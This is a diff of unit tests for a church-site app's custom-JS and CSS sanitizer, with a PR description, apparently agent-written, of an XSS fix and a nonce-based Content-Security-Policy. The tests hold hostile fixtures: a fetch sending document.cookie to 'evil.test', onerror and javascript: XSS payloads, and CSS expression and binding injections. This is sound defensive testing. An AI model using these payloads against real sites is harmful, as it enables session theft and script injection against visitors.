+    assert.equal(isAllowedScriptSrc("https://user:pass@www.googletagmanager.com/gtag/js"), false);
+  });
+});
+
+describe("parseCustomJs", () => {
+  it("allows the documented GA snippet and copies async/defer only", () => {
+    const parsed = parseCustomJs(GA_SNIPPET);
+    assert.deepEqual(parsed.externalScripts, [{ src: "https://www.googletagmanager.com/gtag/js?id=G-ABC123XYZ", async: true, defer: false }]);
+    assert.deepEqual(parsed.measurementIds, ["G-ABC123XYZ"]);
+  });
+
+  it("allows a tight GTM container snippet", () => {
+    const parsed = parseCustomJs(GTM_SNIPPET);
+    assert.deepEqual(parsed.measurementIds, ["GTM-NYC1"]);
+    assert.equal(gtagLoaderSrc("GTM-NYC1"), "https://www.googletagmanager.com/gtm.js?id=GTM-NYC1");
+  });
+
+  it("drops unknown inline JS even when a GA id is mentioned", () => {
+    const parsed = parseCustomJs(`<script>fetch('https://evil.test/?c='+document.cookie); gtag('config', 'G-ABC123XYZ');</script>`);
+    assert.deepEqual(parsed.externalScripts, []);
+    assert.deepEqual(parsed.measurementIds, []);
+  });
+
+  it("drops event-handler attributes, javascript hrefs, and foreign script hosts", () => {
+    const html = `<a href="javascript:alert(1)" onclick="steal()">x</a>
+<script src="https://evil.test/x.js" onerror="steal()"></script>
+<script src="https://www.googletagmanager.com/gtag/js?id=G-OK1" onclick="steal()" defer></script>`;
+    const parsed = parseCustomJs(html);
+    assert.deepEqual(parsed.externalScripts, [{ src: "https://www.googletagmanager.com/gtag/js?id=G-OK1", async: false, defer: true }]);
+    assert.deepEqual(parsed.measurementIds, ["G-OK1"]);
+  });
+
+  it("does not resurrect unsourced inline scripts", () => {
+    const parsed = parseCustomJs(`<script>document.body.innerHTML='pwned'</script><img src=x onerror=alert(1)>`);
+    assert.deepEqual(parsed, { externalScripts: [], measurementIds: [] });
+  });
+});
+
+describe("isAllowedGtagInline", () => {
+  it("accepts the standard gtag bootstrap", () => {
+    assert.equal(isAllowedGtagInline(`window.dataLayer = window.dataLayer || [];
+function gtag(){dataLayer.push(arguments);}
+gtag('js', new Date());
+gtag('config', 'G-ABC123XYZ');`), true);
+  });
+
+  it("rejects extra statements", () => {
+    assert.equal(isAllowedGtagInline(`gtag('config', 'G-ABC123XYZ'); eval('1')`), false);
+  });
+});
+
+describe("sanitizeCustomCss", () => {
+  it("keeps ordinary theme rules", () => {
+    const css = `--accent: #112233; h1 { color: #445566; font-size: 2rem; } .hero { background: url(https://content.churchapps.org/x.jpg); }`;
+    assert.equal(sanitizeCustomCss(css), css);
+  });
+
+  it("strips style breakout, expression, binding, javascript urls, non-https imports, and HTML", () => {
+    const dirty = `color: red; </style><script>alert(1)</script> expression(alert(1)) -moz-binding: url(#x); background: url(javascript:alert(1)); @import url('http://evil.test/x.css'); @import url('//evil.test/x.css'); @import url('https://fonts.googleapis.com/css?family=Roboto'); <img src=x onerror=alert(1)>`;
+    const clean = sanitizeCustomCss(dirty);
+    assert.equal(clean.includes("</style"), false);
+    assert.equal(clean.includes("<script"), false);
+    assert.equal(clean.includes("<img"), false);
+    assert.equal(/expression\s*\(/i.test(clean), false);
+    assert.equal(clean.includes("-moz-binding"), false);
+    assert.equal(/url\s*\(\s*javascript/i.test(clean), false);
+    assert.equal(clean.includes("http://evil.test"), false);
+    assert.equal(clean.includes("//evil.test"), false);
+    assert.equal(clean.includes("https://fonts.googleapis.com/css?family=Roboto"), true);
+    assert.equal(clean.includes("color: red;"), true);
+  });
+});

--- a/tests/unit/customContentSecurity.test.ts
+++ b/tests/unit/customContentSecurity.test.ts
@@ -102,4 +102,22 @@ describe("sanitizeCustomCss", () => {
     assert.equal(clean.includes("https://fonts.googleapis.com/css?family=Roboto"), true);
     assert.equal(clean.includes("color: red;"), true);
   });
+
+  it("strips payloads that would reassemble after a single pass", () => {
+    const clean = sanitizeCustomCss(`width: expexpression(ression(alert(1)); background: <scr<script>ipt>x; -moz--moz-bindingbinding: url(#x);`);
+    assert.equal(/expression\s*\(/i.test(clean), false);
+    assert.equal(/<script/i.test(clean), false);
+    assert.equal(clean.includes("-moz-binding"), false);
+  });
+
+  it("drops @import from hosts CSP style-src does not allow", () => {
+    const clean = sanitizeCustomCss(`@import url('https://evil.test/x.css'); @import url('https://fonts.googleapis.com.evil.test/x.css'); @import url('https://user:pass@fonts.googleapis.com/x.css'); color: red;`);
+    assert.equal(clean.includes("evil.test"), false);
+    assert.equal(clean.includes("user:pass"), false);
+    assert.equal(clean.includes("color: red;"), true);
+  });
+
+  it("strips IE behavior bindings", () => {
+    assert.equal(/behavior\s*:/i.test(sanitizeCustomCss(`behavior: url(evil.htc); color: red;`)), false);
+  });
 });


### PR DESCRIPTION
<!-- CURSOR_AGENT_PR_BODY_BEGIN -->
## H-17

`globalStyles.customJS` was parsed as HTML, assigned to `innerHTML`, then every `<script>` was cloned into the live DOM so it ran for every visitor on `*.b1.church`. Anyone with site-builder / `content.edit` could persist JS (session theft, defacement, keylogging on donate/login). `customCss` was unsanitized. There was no CSP.

B1Admin `CssEdit` is unchanged. The Custom HTML field still saves `customJS`; this PR only changes what B1App will execute.

## Theme.tsx

- No more `innerHTML` + script resurrection.
- Only `<script src="https://...">` whose host is on a fixed allowlist: `www.googletagmanager.com`, `www.google-analytics.com`. `async` / `defer` are copied; other attributes (including event handlers) are dropped.
- Tight gtag inline (`gtag('config', 'G-XXXX')`) and the standard GTM snippet (`GTM-XXXX`, IDs `^[A-Z0-9-]+$`) are accepted. IDs are applied programmatically. Everything else is dropped (unknown inline JS, `javascript:` hrefs, event-handler attributes, Meta Pixel, Crisp, Intercom, etc.).
- `customCss` is sanitized before it is placed in `:root`: `</style`, `expression(`, `-moz-binding`, `url(javascript:`, `@import` to non-https, and HTML tags are stripped. Ordinary property rules still work.

Documented GA snippets from CssEdit still work. Random volunteer JS does not.

## Headers

Existing `/sw.js` `Service-Worker-Allowed` + cache rules are unchanged. `next.config.mjs` sets on every route:

- `Strict-Transport-Security: max-age=31536000; includeSubDomains`
- `X-Content-Type-Options: nosniff`
- `Referrer-Policy: strict-origin-when-cross-origin`

The enforced `Content-Security-Policy` (not report-only) is built in `src/helpers/contentSecurityPolicy.ts` and set in `src/middleware.ts`, because it carries a **per-request nonce** and `next.config.mjs` headers are static. Middleware sets the policy on the request (Next reads the nonce out of it and stamps its bootstrap/streaming scripts and `<Script>` tags) and on the response.

**`script-src`** is `'self' 'nonce-…'` plus the GA/GTM hosts, Stripe (`js.stripe.com`) and reCAPTCHA (`www.google.com`, `www.gstatic.com`). **No `'unsafe-inline'` and no `'unsafe-eval'`** — an injected inline script has no nonce and does not run, so CSP is a real second line of defense behind the Theme allowlist rather than only a host restriction. `next dev` additionally gets `'unsafe-eval'` and the local API/websocket ports; those relaxations are gated on `NODE_ENV !== "production"`.

**`style-src`** keeps `'unsafe-inline'`. A nonce cannot authorize a style *attribute*, and React/MUI set element `style` props throughout the app, so removing it would break rendering rather than harden anything. `customCss` is sanitized before it reaches the page and `@import` is limited to the hosts `style-src` allows.

`X-Frame-Options: DENY` is **not** set. Church sites are embedded by Lessons and B1.

**`frame-ancestors`** is set to `'self' https://*.b1.church https://b1.church https://*.churchapps.org https://churchapps.org https://lessons.church https://*.lessons.church`. Apex hosts are included because `*.b1.church` does not match `b1.church`. Parents outside that list will be blocked.

**`frame-src`** is `'self' https:` rather than a closed YouTube/Vimeo list. WebsiteUrlPage, stream interaction tabs, and sermon `videoUrl` embed church-chosen URLs; a closed list would break those.

`connect-src` covers ChurchApps APIs, B1, Lessons, GA, Sentry ingest, Stripe, YouVersion, and messaging websockets.

Routes outside the middleware matcher (`/_next/*`, `/api/*`, dotted paths) no longer get a CSP header; they still get HSTS/nosniff/Referrer-Policy. Every HTML route is covered.

### Rendering

A statically prerendered page ships without a per-request nonce, so its scripts would be blocked. `/localhost` and `/socialSuggestions` were the only two prerendered routes; each now has a `force-dynamic` segment layout. Verified against `next build && next start` and `next dev`: every script tag carries the response nonce, pages hydrate, and no CSP violations are reported.

`ChurchAnalytics` validates its church-editable `ga4MeasurementId` against the same GA/GTM id pattern before interpolating it into an inline script — that script now carries the nonce, so an unvalidated value there would have been a script-injection sink.

## Breaking change

Churches that pasted **Meta Pixel, Crisp, Intercom, chat widgets, donation overlays, or any other non-allowlisted script** will **silently stop** until those hosts are added to the Theme allowlist **and** CSP `script-src`. Snippets that rely on inline JS will not work even if their host is allowlisted, because `script-src` has no `'unsafe-inline'`. The list is not expanded to “any https.”

## Tests

`yarn test:unit` (Node built-in test runner, no new deps) covers allow/deny for script hosts, GA/GTM snippets, hostile inline JS, and CSS sanitizer cases (including payloads that reassemble after a single strip pass and `@import` hosts CSP does not allow), plus the CSP builder: no `'unsafe-inline'`/`'unsafe-eval'` in `script-src`, nonce placement, dev-only relaxations, `frame-ancestors`, and a guard that Meta/Crisp/Intercom stay out of `script-src`.

## Out of scope

B1Admin, SignPresenter, FreeShow.
<!-- CURSOR_AGENT_PR_BODY_END -->

<div><a href="https://cursor.com/agents/bc-eca54bfb-e8d2-469b-aceb-44c4eb4874f9?cursor_ref=pr_footer&cursor_cta=open_in_web"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-web-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-web-light.png"><img alt="Open in Web" width="114" height="28" src="https://cursor.com/assets/images/open-in-web-dark.png"></picture></a>&nbsp;<a href="https://cursor.com/background-agent?bcId=bc-eca54bfb-e8d2-469b-aceb-44c4eb4874f9&cursor_ref=pr_footer&cursor_cta=open_in_cursor"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-cursor-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-cursor-light.png"><img alt="Open in Cursor" width="131" height="28" src="https://cursor.com/assets/images/open-in-cursor-dark.png"></picture></a>&nbsp;</div>


